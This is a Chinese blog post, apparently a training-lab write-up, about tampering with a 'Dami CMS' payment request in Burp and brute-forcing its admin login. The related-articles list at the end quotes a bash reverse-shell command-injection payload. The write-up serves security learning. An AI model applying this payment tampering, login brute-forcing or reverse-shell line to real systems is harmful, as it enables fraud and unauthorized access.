首页 > 其他分享 >大米cms爆破后台及支付逻辑漏洞

大米cms爆破后台及支付逻辑漏洞

时间:2022-10-30 11:45:34浏览次数:73  
标签:逻辑 爆破 漏洞 支付 后台 大米 cms

又找到个网站挖洞,我来康康。

大米手机是个什么鬼手机??看一下吧

这个支付页面好熟悉,可能存在支付逻辑漏洞,咱们用burp改个包看看。

先支付一个看看

把包里那个=1改成0试试~

证实确实存在支付逻辑漏洞

前面应该只是一个小插曲,这里的任务是爆破管理员后台。我尝试/admin登陆,发现没有这个地址。

然后我就拿御剑浅浅扫一下吧。

御剑扫不出来,这个是看别人的地址摸索出来的

然后就用burp尝试爆破一下吧

在账户和密码添加爆破模块,验证码好像不变,就不用更改

然后看结果有俩结果和其他的好像不一样啊

试一下,账号密码zkaq卧槽

这就进来了…….

标签:逻辑,爆破,漏洞,支付,后台,大米,cms
From: https://www.cnblogs.com/fugodd-hacker/p/16840819.html

相关文章

  • 任意文件下载漏洞
    任意文件下载漏洞概述网站由于业务需求,提供文件查看或下载功能,如果对用户查看或下载的文件不做限制,恶意用户就能够查看或下载任意文件,任意文件类型包含源代码文件、敏感......
  • SEED实验:缓冲区溢出漏洞实验__网络攻防实验
    sudosysctl-wkernel.randomize_va_space=0sudosucd/binrmshln-szshsh/*stack.c//Thisprogramhasabufferoverflowvulnerability.//Ourtaskis......
  • 后漏洞利用阶段
    补充因本次实验所写博客篇幅过长,本篇为上篇内容的补充。上篇为Windows缓冲区溢出后漏洞利用阶段当我们利用SLMail的缓冲区溢出漏洞控制系统后,我们还要进行上传工具、提......
  • XXE漏洞
    XXE漏洞XXE概述XXE,即XML外部实体注入。该漏洞是在对不安全的外部实体数据进行处理时引发的安全问题。文档结构XML是可扩展的标记语言,设计用来进行数据的传播和存储。X......
  • 未授权访问漏洞
    未授权访问漏洞未授权访问,顾名思义是指在不进行请求授权的情况下对需要权限的功能进行访问执行。通常是由于认证页面存在缺陷、无认证,或安全配置不当导致。常见于服务端口......
  • 未授权访问漏洞
    未授权访问漏洞未授权访问,顾名思义是指在不进行请求授权的情况下对需要权限的功能进行访问执行。通常是由于认证页面存在缺陷、无认证,或安全配置不当导致。常见于服务端口......
  • 业务逻辑漏洞
    业务逻辑漏洞逻辑漏洞,是由于代码逻辑是通过人的逻辑去判断的,每个人都有自己的思维,容易产生不同的想法,导致程序编写完以后会随着人的思维逻辑产生不足。常见的逻辑漏洞身......
  • kali 漏洞篇-命令注入 学习笔记
    反弹shell在kali上使用nc监听端口nc-lvnp5555,在dvwaweb页面输入攻击payload: 127.0.0.1|bash-i>&/dev/tcp/172.16.1.2/55550>&1 命令注入常见函数eval(......
  • 帝国CMS:如何删除字段某个字符之后的所有字符串?
    需求场景:数据表中,因为采集出现的多余字符,比如不需要的多个标题内容,以下划线分割。我们只需要取第一个下划线之前内容,其余的需要删除。步骤说明:1.进入宝塔后台,进入指定......
  • Apache SSI 远程命令执行漏洞
    ApacheSSI远程命令执行漏洞ssi简介SSI(服务器端包含)是放置在HTML页面中的指令,并在服务页面时在服务器上对其进行评估。它们使您可以将动态生成的内容添加到现有的HTML页......